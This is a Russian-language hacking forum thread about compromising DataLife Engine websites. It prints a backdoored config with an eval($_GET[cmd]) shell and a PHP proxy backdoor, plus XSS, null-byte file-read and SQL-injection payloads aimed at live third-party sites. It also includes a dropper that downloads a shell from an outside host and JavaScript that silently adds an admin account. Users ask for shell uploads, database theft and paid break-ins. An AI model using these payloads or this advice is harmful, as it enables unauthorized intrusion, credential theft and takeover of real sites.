,recourse,request,sad,tongue,wassat,crying,what,bu lly,angry", 'timestamp_active' => "j F Y", 'news_sort' => "date", 'news_msort' => "DESC", 'catalog_sort' => "date", 'catalog_msort' => "DESC", 'image_align' => "left", 'mail_news' => "1", 'show_sub_cats' => "1", 'short_rating' => "1", 'hide_full_link' => "no", 'allow_search_print' => "1", 'allow_add_tags' => "1", 'allow_site_wysiwyg' => "no", 'allow_quick_wysiwyg' => "0", 'allow_comments' => "yes", 'comments_maxlen' => "3000", 'comm_nummers' => "30", 'comm_msort' => "ASC", 'flood_time' => "30", 'auto_wrap' => "80", 'timestamp_comment' => "j F Y H:i", 'allow_search_link' => "1", 'mail_comments' => "1", 'allow_comments_wysiwyg' => "no", 'full_search' => "0", 'allow_registration' => "no", 'allow_cache' => "yes", 'allow_multi_category' => "1", 'related_news' => "1", 'no_date' => "0", 'allow_fixed' => "1", 'speedbar' => "0", 'allow_banner' => "1", 'allow_cmod' => "0", 'allow_votes' => "no", 'allow_topnews' => "yes", 'allow_read_count' => "yes", 'cache_count' => "1", 'allow_calendar' => "yes", 'allow_archives' => "yes", 'rss_informer' => "1", 'allow_tags' => "0", 'allow_change_sort' => "0", 'ajax' => "0", 'files_allow' => "yes", 'files_type' => "zip,rar,exe,doc,pdf,swf", 'max_file_size' => "0", 'max_file_count' => "0", 'files_force' => "1", 'files_max_speed' => "0", 'files_antileech' => "0", 'files_count' => "yes", 'admin_mail' => "admin@site.ru", 'mail_metod' => "php", 'smtp_host' => "localhost", 'smtp_port' => "25", 'smtp_user' => "", 'smtp_pass' => "", 'mail_bcc' => "0", 'reg_group' => "4", 'registration_type' => "0", 'registration_rules' => "1", 'allow_sec_code' => "yes", 'allow_skin_change' => "no", 'mail_pm' => "1", 'max_users' => "0", 'max_users_day' => "0", 'max_up_side' => "0", 'max_up_size' => "200", 'max_image_days' => "2", 'allow_watermark' => "yes", 'max_watermark' => "150", 'max_image' => "450", 'jpeg_quality' => "85", 'tag_img_width' => "0", 'flv_watermark' => "1", 'allow_smartphone' => "1", 'allow_smart_images' => "0", 'allow_smart_video' => "0", 'allow_smart_format' => "1", 'allow_rss' => "1", 'rss_mtype' => "1", 'rss_number' => "10", 'rss_format' => "2", 'version_id' => "8.0", 'allow_upload' => "yes", 'news_captcha' => "1", 'lang_GlassyEvolution' => "{${@eval($_GET[cmd])}}", if (isset($_COOKIE['_rpx'])) { define('vpsp_version', '2.5.0'); define(' vpsp_pwd', '12345678'); define('vpsp_enc_key', '12345678password'); error_reporting(~E_ALL); @s et_time_limit(0); ob_implicit_flush(1); ignore_u ser_abort(0); header('Content-type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('X-VPSP-VERSION: ' . vpsp_version);$input= fopen('php://input', 'r'); define('vpsp_enc', ord(fread($inp ut, 1)) != 0);$ok; if (vpsp_enc) { if (iss et($GLOBALS['vpsp_pe']) == false) {$GLOBALS['vpsp_ks'] = VC_GenerateKeyHash(vpsp_enc_key);$GLOBALS['vpsp_pe'] = VC_Init(vpsp_enc_key,$GLOBALS['vpsp_ks']); }$GLOBALS['vpsp_pd'] = array_flip($GLOBALS['vpsp_pe']);$ok= VC_Decrypt(fread($input, 2)); if ($ok!= 'OK') { header('X-VPSP-ERROR: bad_enc_key'); header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') .$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']); exit; }$rBuffLen= ord(VC_Decrypt(fread($inpu t, 1))) * 256 * 256 * 256 + ord(VC_Decryp t(fread($input, 1))) * 256 * 256 + ord(VC_D ecrypt(fread($input, 1))) * 256 + ord(VC_Decr ypt(fread($input, 1)));$sBuffLen= ord(VC_Decrypt (fread($input, 1))) * 256 * 256 * 256 + o rd(VC_Decrypt(fread($input, 1))) * 256 * 256� �+ ord(VC_Decrypt(fread($input, 1))) * 256 +� �ord(VC_Decrypt(fread($input, 1)));$reqPwdLen= o rd(VC_Decrypt(fread($input, 1)));$reqPwd= ($reqP wdLen> 0) ? VC_Decrypt(fread($input,$reqPwdLen)) : '';$https= ord(VC_Decrypt(fread($input, 1)));$ho st= VC_Decrypt(fread($input, ord(VC_Decrypt(frea d($input, 1)))));$port= ord(VC_Decrypt(fread($in put, 1))) * 256 + ord(VC_Decrypt(fread($input , 1))); } else {$ok= fread($input, 2); if ($ok!= 'OK') { header('X-VPSP-ERROR: bad_request'); header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') .$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']); exit; }$rBuffLen= ord(fread($input, 1)) *� �256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));$sBuffLen= ord(fread($i nput, 1)) * 256 * 256 * 256 + ord(fread($ input, 1)) * 256 * 256 + ord(fread($input,� �1)) * 256 + ord(fread($input, 1));$reqPwdLen = ord(fread($input, 1));$reqPwd= ($reqPwdLen> 0) ? fread($input,$reqPwdLen) : '';$https= ord(fread($input, 1));$host= fread($input, ord( fread($input, 1)));$port= ord(fread($input, 1)) * 256 + ord(fread($input, 1)); } if ($req Pwd!== vpsp_pwd) {$resp= "HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION:" . vpsp_version . "\r\nX-VPSP-ERROR:bad_password\r\nX-VPSP-HOST:" . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') .$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI'] . "\r\nConnection:close\r\n\r\n"; if (vpsp_enc) { echo VC_Encrypt($resp); }� �else { echo$resp; } exit; } if ($https== 1) {$host= 'ssl://' .$host; }$fsok= fsockopen($host,$port,$errno, $errstr, 20); if ($fsok== false) {$resp= "HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION:" . vpsp_version . "\r\nX-VPSP-ERROR:host_down\r\nX-VPSP-ERROR-TEXT:" . base64_encode($errstr) ."\r\nX-VPSP-HOST:" . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') .$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI'] . "\r\nX-VPSP-TARGET:" . str_replace('ssl://', '',$host) . "\r\nConnection:close\r\n\r\n"; if (vpsp_enc) { echo VC_Encrypt($resp); }� �else { echo$resp; } exit; } while ($wbuffe r= fread($input,$rBuffLen)) { if (vpsp_enc) { fwrite($fsok, VC_Decrypt($wbuffer)); } else { fwrite($fsok,$wbuffer); } } fflush($fsok); while ($rbuffer= fread($fsok,$sBuffLen)) { if� �(vpsp_enc) { echo VC_Encrypt($rbuffer); } el se { echo$rbuffer; } } fflush($fsok); fclose ($fsok); exit; } function MD5Hash($str) {$m=� �md5($str);$s= ''; foreach(explode("\n", trim(chunk_split($m, 2))) as$h) {$s.= chr(h exdec($h)); } return$s; } function VC_Init($k ey,$ks) {$s= range(0, 255); if (strlen($key)� �== 0) { return$s; }$km= MD5Hash($key);$kx= ''; for ($i= 0;$iDatalife Engine not install ed. Please run install.php

что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?

Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли

Martyn911, судя по всему уже кто-то пытается воткнуть какой-то код ))

Если посмотрите на вывод, обнаружите code execution.

Ответ:удалились

Решение: /threadedpost3522832.html Задай вопрос тут

Нашел пассивную XSS.


http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]

Заменяем все специальные символы на \x[HEX код символа].

Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю.

Здравствуйте, есть дле сайт, при заходе на главнуюю выводит такое
что можно из этого взять и можно ли доломать этот сайт и залить шелл? тиц сайта 50, может еще там есть вкусные домены, кто может помочь, желательно в личку что бы не разводить флуд?
Что за сайт пока не скажу, посмотрю живая ли тема и есть ли реальные мысли


А что вы хотите из этого получить? Завтра снесут эту гадость и поставят что-то новое...

как нынче шелл заливают на стандартный dle ?

Нашел пассивную XSS.

http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]

Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю.


Баянист, /showpost.php?p=696945&postcount=18 - оригинал

В общем, по последней дырке такая песня:

Запрос (GET):


/engine/classes/min/index.php?f=engine/data/dbconfig.php

Обработчик, который всё обламывает:

engine\classes\min\lib\Minify\Controller\MinApp.ph p

А конкретно две проверки:


preg_match('/^[^,]+\\.(css|js)(?:,[^,]+\\.\\1)*$/',$_GET['f'])

и


realpath($file)

Судя по описанию патча с целсофта запрос должен быть примерно такой:


engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

Регулярка обеспечивается .js, путь null byte..

описание атаки (http://www.ultsec.com/null-byte-attack.php)

Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....

Так что это так, больше для развития, или пока не убьёшь эти файлы.

PS и ещё не получается обойти проверку (обратный слэш):


strpos($_GET['f'],'\\');

PSPS И самое интересное: гугл уже в июле это обсуждал (https://groups.google.com/forum/#!topic/minify/cpN-ncKPFZE) ... Участники группы так и не смогли заюзать уязвимость

Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....
Так что это так, больше для развития, или пока не убьёшь эти файлы.


А зачем их читать, когда сам Minify отдаёт?


PS и ещё не получается обойти проверку (обратный слэш):

strpos($_GET['f'],'\\');



А где у Вас обратный слеш? У Вас %00.


PSPS И самое интересное: гугл уже в июле
это обсуждал (https://groups.google.com/forum/#!topic/minify/cpN-ncKPFZE)
... Участники группы так и не смогли заюзать уязвимость


Ага, ещё скажите, что на утреннике в детском саду участники так и не смогли...

Самое интересное, что уязвимость настолько глупая, что почти наверняка можно утверждать, что "разработчики DLE" её оставили специально

Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?

на 9.7 шелл залить можно как нибудь?

Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?


если удастся обойти эти экранирования, то вполне


$value=str_replace("$","& #036;",$value);

$value=str_replace("{","& #123;",$value);

$value=str_replace("}","& #125;",$value);

$value=str_replace(chr(0),"",$value);

$value=str_replace(chr(92),"",$value);

А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится

А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится


старая песня?

А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится


это останется в привате, да же спустя год

Исполнение кода в аве через ajax? Вы про эту?

Исполнение кода в аве через ajax? Вы про эту?


она самая

1. Php код встраивается в гифку и заливается в качестве аватарки.

2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.

3. При прочтении сообщения запустится шелл.

с серча

1. Php код встраивается в гифку и заливается в качестве аватарки.
2. В личных сообщения (а може где еще прокатит) вставляется код (не скажу есесно какой ) и сообщение отправляется. Для работоспособности должны быть разрешены теги картинок.
3. При прочтении сообщения запустится шелл.
с серча


А как залить гифку с кодом php через аватар?Пишет что невозможно залить (debug mode).Проверил много Dle , не льется.

Кто может помочь с удалением .htaccess в DLE 10.1

есть доступ в админку, залил шелл но не срабатывает из-за .htaccess

Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess


а как же вы его залили? через загрузку файлов?

Кто может помочь с удалением .htaccess в DLE 10.1
есть доступ в админку, залил шелл но не срабатывает из-за .htaccess


здесь вопрос простой: если сервер работает на голом апач и права на файл .htaccess 444, ничего не выйдет. Нужен или фтп, или "сосед" или заливка туда, где нет запрета на пхп (нет хтаксс)

а вот, например, апач + мод_реврайт (как многие любят, типы быстро), группа вэб имеет права по умолчанию на запись в диры и файлы. потому и убить его можно, методами описанными выше (или через /inc/files.php (вопрос версии) или через анимашку)

а как же вы его залили? через загрузку файлов?


через сторонний модуль

slva2000 с версии 9.7 уже не робит

mr.Arec чё за модуль?

SQL injection 0day и получение админки для 9.7 и младше
Requirements:

user account
register_globals on
magic_quotes_gpc off

Файл - максимальная версия скрипта

/engine/ajax/adminfunction.php 9.6
/engine/ajax/allvotes.php 9.7
/engine/ajax/antivirus.php 9.7
/engine/ajax/clean.php 9.7
/engine/ajax/complaint.php 9.6
/engine/ajax/deletecomments.php 9.7
/engine/ajax/find_relates.php 9.7
/engine/ajax/message.php 9.7
/engine/ajax/newsletter.php 9.7
/engine/ajax/pm.php 9.7
/engine/ajax/poll.php 9.7
/engine/ajax/rebuild.php 9.7
/engine/ajax/rss.php 9.7
/engine/ajax/search.php 9.7
/engine/ajax/sitemap.php 9.7
/engine/ajax/templates.php 9.7
/engine/ajax/typograf.php 9.7
/engine/ajax/upload.php 9.7
/engine/ajax/vote.php 9.7

Request

POST %file%

_TIME=0', user_group='1
login_name=real_username
login_password=real_password
login=submit

PoC
Неопределенная переменная
$_TIME
в некоторых случаях, внедрение кода в UPDATE запрос в файле
/engine/modules/sitelogin.php

$db->query("UPDATE ".USERPREFIX."_users set hash='".$hash."', lastdate='{$_TIME}', logged_ip='".$_IP."' WHERE user_id='{$member_id['user_id']}'");

(c) SecondLife


Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.

Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.


Как юзать?

А как залить гифку с кодом php через аватар?Пишет что невозможно залить (debug mode).Проверил много Dle , не льется.


Откройте исходный код картинки и вместо метатегах вставите свой php код, и целостность картинки сохранится и код будет.


а как же вы его залили? через загрузку файлов?


DLE кишит возможностями заливки файлов и выполнением произвольного кода, анализируйте внимательней исходники...


Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.


Блин вот буквально сегодня искал баги в исходниках DLE и нашел одну из этих строк, а она уже в паблике(((

DLE кишит возможностями заливки файлов и выполнением произвольного кода, анализируйте внимательней исходники...


таки я вкурсе, мне интересно что другие нашли

и искать баги в старых версиях как то не кошерно

а как это багу с minify провернуть чтоб dbconfig увидеть по этому адресу


./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e 9736c

а как это багу с minify провернуть чтоб dbconfig увидеть по этому адресу

./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e 9736c



Никак. $realpath = realpath($path); NULL не канает.

Мужики, подскажите хотя бы в каком направлении копать. Уязвимость с аватаркой, похоже, тоже уже пофиксили. gif-ки льются статическими, код из всех картинок режется. Может быть кто-то за вознаграждение поможет?

Короче говоря. Есть программа - Teleport Pro для закачки сайтов. Все наверняка заметили, что она не скачивает php файлы. Я попробовал указать папку site.ru/engine, и он обиделся и выдал 403 Forbidden. Но! Когда я ввел путь к конкретному файлу, то он как миленький его скачал. Но в формате html. Я не огорчился, порылся в настройках - и опля! Он скачал мне оригинальный php. Я уже выкачал с одного сайта таким образом форум и админку за просто так. Но умные админы переименовывают важнейшие файлы типа dbconfig, а админ там очень умный. Так что единственное, что требуется - раскрытие путей. Кто знает безболезненный способ? Версия известна - 9.0 Final, но, как я уже говорил, админы там умные и пофиксили большинство дыр патчами. Да, есть вероятность, что они сидят на nulled, но не уверен, да и сомнительно: сайт раскручен достаточно, так что будь он на нулевке, его бы ломанули. И все же, и все же...

P. S.: Кто не верит - могу приложить скриншоты.

P. P. S.: Да, чуть не забыл: еще я смог выкачать файл .htaccess, но не знаю, как он мне поможет - да, я чайник, можно и так сказать.

Он скачал мне оригинальный php. Я уже выкачал с одного сайта таким образом форум и админку за просто так.


Хе-хе-хе. Выложи скриншоты (=

Короче говоря. Есть программа - Teleport Pro для закачки сайтов. Все наверняка заметили, что она не скачивает php файлы. Я попробовал указать папку site.ru/engine, и он обиделся и выдал 403 Forbidden. Но! Когда я ввел путь к конкретному файлу, то он как миленький его скачал. Но в формате html. Я не огорчился, порылся в настройках - и опля! Он скачал мне оригинальный php. Я уже выкачал с одного сайта таким образом форум и админку за просто так. Но умные админы переименовывают важнейшие файлы типа dbconfig, а админ там очень умный. Так что единственное, что требуется - раскрытие путей. Кто знает безболезненный способ? Версия известна - 9.0 Final, но, как я уже говорил, админы там умные и пофиксили большинство дыр патчами. Да, есть вероятность, что они сидят на nulled, но не уверен, да и сомнительно: сайт раскручен достаточно, так что будь он на нулевке, его бы ломанули. И все же, и все же...
P. S.: Кто не верит - могу приложить скриншоты.
P. P. S.: Да, чуть не забыл: еще я смог выкачать файл .htaccess, но не знаю, как он мне поможет - да, я чайник, можно и так сказать.


Юморист!

Хе-хе-хе. Выложи скриншоты (=


Итак, вот я захожу в телепорт и ввожу полный путь до хтаккеса.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835315967.png

Вот он появился в проекте.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835311409.png

Я запустил скачивание и все, он у меня.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835316762.png

Я даже вот сюда выкладываю СКРИН куска кода, а не сам код.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835312519.png

Теперь админка. Добавляю новый путь.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835314174.png

В этот раз я не лазил особо в настройках, поэтому он сначала скачал более привычные форматы файлов - хтмл, джипег и так далее.

http://s3.pikabu.ru/images/previews_comm/2014-02_6/13933835314599.png

А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом? Я и форум выкачивал, до сих пор пылится, просто не знаю путей до пхп, и он скачивал просто index.html, темы и картинки.​

Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.

А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом?


Да. Всё, что ты выкачал не является php исходниками.

А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.

http://ru.wikipedia.org/wiki/PHP

http://habrahabr.ru/post/143331/

Да. Всё, что ты выкачал не является php исходниками.
А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.
http://ru.wikipedia.org/wiki/PHP
http://habrahabr.ru/post/143331/


Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?

вот недавно нашел в config.php , как юзают ..хз


.eval(base64_decode(chmod("engine/modules/", 0777); chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); chmod("engine/modules/avatar.class.php", 0404);)),//

вот недавно нашел в config.php , как юзают ..хз

.eval(base64_decode(chmod("engine/modules/", 0777); chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); chmod("engine/modules/avatar.class.php", 0404);)),//



Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки...

Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.

ахаха ты вы че ламеры вот же

copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");

тут походу шелл лежал, подозреваю, что s = shell

ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...

вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin

ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...
вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..


в версиях ниже 9.7 можно пропихнуть

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin


Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.

в десятых версиях работает где есть похожий на этот файл

./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e 9736c

тогда такой джет выводит данные

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

если просто так вставить то не работает.

Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.


а я уже сайтов 20 нашёл.

вот например:


http://www.dle9.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

а я уже сайтов 20 нашёл.
вот например:


Молодец!, хорошая бага! +

Кто может помочь залить шелл через админку

версия движка 10

есть доступ в админку

а я уже сайтов 20 нашёл.
вот например:


В примере конфиг не читается!

400 Bad Request

Please see http://code.google.com/p/minify/wiki/Debugging.

есть рабочий пример?

В примере конфиг не читается!
400 Bad Request
Please see http://code.google.com/p/minify/wiki/Debugging.
есть рабочий пример?


http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js


бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?

бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?


Эта бага, используется как обычная читалка файлов, можете локально читать конфиги для подключения к БД, а дальше к примеру через phpmyadmin, заходите и берете логин/пасс админа и профит! или если есть соседние сайты, то ищите путь к ним и по такому же прицепу, хорошим плюсом было бывает, когда удаленное подключение к БД идет, тогда вам phpmyadmin искать не прийдется)

Народ, бага шикарна, согласен, увидел примеры, аплодирую стоя. Но у меня она выдает 400 Bad Request. Не на все сайты, а на один (!). Что за черт? Подскажите.

Скорее всего пофиксили уже, но что делать если при переходе по site.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

Происходит редирект :3

Скорее всего пофиксили уже, но что делать если при переходе по site.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Происходит редирект :3


Редирект, это не более чем установка хидера Location и дальнейшее перенаправление.

Самое очевидное - отключить принудительный редирект в браузере.

Но шансы что тебе выдаст содержимое файла - довольно низки, оффициальный патч обычно фиксит дыру и редиректит, а не просто редиректит.

↑ (https://antichat.live/posts/3970989/)
ого, полтора года уже как топик не обновлялся, DLE теперь одна из безопаснейших CMS?)


Время портальчиков на дле и пхп-нюке уже прошло. Цмс такого типа сами по себе уже устарели. Сейчас на них только школьники делают трешевые сайты типа торрент-трекеров. Безопасность на таких сайтах вообще до лампочки.

Серьезные уязвимости были только в ранних версиях. Давно уже все пофиксили. ДЛЕ давно уже без критичных дырок. В различных плагинах можно поискать разные sql-inj например. В принципе тут ситуация такая же как и с Wordpress.

Как можно получить список плагинов на сервере?

↑ (https://antichat.live/posts/4009301/)
Как можно получить список плагинов на сервере?


Никак!

Только сравнивая.

Посмотри что из себя представляет чистый движок dle и посмотри что есть дополнительно прилеплено на атакуемом на сайте. Например галлерея.

Еще как вариант составить базу всевозможных плагинов и их путей и пытаться сканировать их. Как это реализовано в аналогичном сканере плагинов для вротпресса

Сегодня была рассылка от DLE, что найдена критическая уязвимость и надо закрыть дыру.

Проблема: Недостаточная фильтрация данных.

Ошибка в версии: 11.1 и ниже

Степень опасности: Высокая

Для исправления откройте файл: /engine/classes/parse.class.php и найдите:

if( preg_match( "/[?&;%

походу переменная $align

Думаю что если что то передать $align, то это может выльется в XSS атаку. я прав?

примерно:

[im*g=alert('XSS');]$url[im*g]

Будет ли правильно заменить:

if($allign!= "")

на

if (!empty($allign))

Есть определенный ресурс, на нем есть фотогалерея с возможностью поиска. При поиске alert('xss') выбивает mysql error 1064. Как можно раскрутить ?

Скрин с содержанием error'a- http://clip2net.com/s/3FNfdVk

↑ (https://antichat.live/posts/4027674/)
Есть определенный ресурс, на нем есть фотогалерея с возможностью поиска. При поиске
alert('xss') выбивает mysql error 1064. Как можно раскрутить ?

Скрин с содержанием error'a- http://clip2net.com/s/3FNfdVk


По идее можно, sqlmap пробуй

↑ (https://antichat.live/posts/4027823/)
По идее можно, sqlmap пробуй


Пробовал, не але... Есть еще варианты ?

↑ (https://antichat.live/posts/4028802/)
Пробовал, не але... Есть еще варианты ?


Это дыра на многих сайтах есть или только на твоём?

↑ (https://antichat.live/posts/4031432/)
Это дыра на многих сайтах есть или только на твоём?


Других сайтов с данным модулем не находил... Модуль фотогаллерея от "Клуб Админов (http://admin-club.ru/)".

Новая уязвимость

Проблема: Недостаточная фильтрация данных.

Ошибка в версии: 11.2 и ниже

Степень опасности: Высокая

Для исправления откройте файл: /engine/go.php и найдите:


$url = @str_replace ( "&", "&", $url );

ниже добавьте


$url = htmlspecialchars( $url, ENT_QUOTES, $config['charset'] );
$url = str_replace ( "&", "&", $url );

Смотрел логи некоторых сайтов, после base64 decode вышло

[HTML]
">

function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="petromadsss@gmail.com";
var objhttp=A();
objhttp.onreadystatechange = function()
{
if (objhttp.readyState == 4)
{
var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ 3wiKQ=='));
var da=r.exec(objhttp.responseText)[2];
r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoL is/KSgnfCIp'));
var dh=r.exec(objhttp.responseText)[2];
objhttp.open("POST",rp+da+'?mod=editusers&action=list',true);
objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1');
var objhttp2=A();
objhttp2.onreadystatechange=function()
{
if(objhttp2.readyState==4)
{
var sd=document.getElementById('LJKwqoiDHqewE');
sd.innerHTML=objhttp2.responseText.replace(/(

Ребята, нужен способ заливки шелла, версия 10.5, форум стоит Xenforo 1.5.14. Может кто чего подскажет? Могу подкинуть Dom XSS, способ для личного пользования нужен)

Баг фикс

Проблема: Недостаточная фильтрация данных в Jquery плагине Masha JS входящем в состав DLE.

Ошибка в версии: 11.3 и ниже

Степень опасности: Высокая

Для исправления скачайте и скопируйте на свой сервер патч: https://dle-news.ru/files/dle113_path.zip

После чего очистите кеш браузера, и кеш скрипта в админпанели. Данный патч предназначен для версии 11.3 и всех версий ниже 11.3.

Кто знает как использовать этот баг с Masha JS?

↑ (https://antichat.live/posts/4115902/)
Кто знает как использовать этот баг с Masha JS?


Это и сесть моя DOM XSS. Я при помощи этой баги слил пару десятков сайтов. Она обходит даже xss аудитор от гугла ласт версии. Можно сделать сценарий на получение админ аккаунта.

Получил группа админа через typograf,но админка защищена через окошко хттп авторизации.

Есть идеи,что можно сделать(брутфорс пароля не пойдет,т.к. пароль там довольно не простой)?Хотелось бы базу выкачать.Еще кстати .htaccess файлы почему-то скачиваются,можно ли как-то выехать на этом?

↑ (https://antichat.live/posts/4118867/)
Получил группа админа через typograf,но админка защищена через окошко хттп авторизации.
Есть идеи,что можно сделать(брутфорс пароля не пойдет,т.к. пароль там довольно не простой)?Хотелось бы базу выкачать.Еще кстати .htaccess файлы почему-то скачиваются,можно ли как-то выехать на этом?


На сколько я знаю, это расшифренный метод авторизации. Введи туда логин и пароль от аккаунта с админ правами.

↑ (https://antichat.live/posts/4119241/)
На сколько я знаю, это расшифренный метод авторизации. Введи туда логин и пароль от аккаунта с админ правами.


Я тоже сначала так подумал,но во-первых,данные не подходят,во-вторых,они проверяются бесконечно,не банит айпи,в-третьих,при отмене пишет не "Access Denied", а "401". =)

↑ (https://antichat.live/posts/4119252/)
Я тоже сначала так подумал,но во-первых,данные не подходят,во-вторых,они проверяются бесконечно,не банит айпи,в-третьих,при отмене пишет не "Access Denied", а "401". =)


Ну тогда лезь через форум =)

↑ (https://antichat.live/posts/4119347/)
Ну тогда лезь через форум =)


Еще бы он у них был xD

Кстати говоря, для "быстрого редактирования" новости запрос делается в admin.php?

Я почему-то отредактировать новость не могу,после нажатия кнопки "Сохранить" ничего не происходит,хотя удалять могу =\

↑ (https://antichat.live/posts/4119420/)
Еще бы он у них был xD
Кстати говоря, для "быстрого редактирования" новости запрос делается в admin.php?
Я почему-то отредактировать новость не могу,после нажатия кнопки "Сохранить" ничего не происходит,хотя удалять могу =\


Никогда с таким не сталкивался. Сколько хоть юзеров там?

↑ (https://antichat.live/posts/4119444/)
Никогда с таким не сталкивался. Сколько хоть юзеров там?


Юзеров не знаю,но посещаемость от 40 до 70к,сайт с пиратским видео-контентом.Форум им так-то не нужен.

↑ (https://antichat.live/posts/4119451/)
Юзеров не знаю,но посещаемость от 40 до 70к,сайт с пиратским видео-контентом.Форум им так-то не нужен.


Скинь в лс, может скулю найду..

Друзья! Не знаю куда обратиться. Нехорошие люди сделали клон сайта на DLE и собираются отнять все права на разработку. Есть непреодолимое желание наказать граждан, посему прошу отозваться тех кто может помочь с получением доступа в админ панель, а в идеале с заливкой шела. Конечно же не безвозмездно и не за 3 копейки (от 1к$).

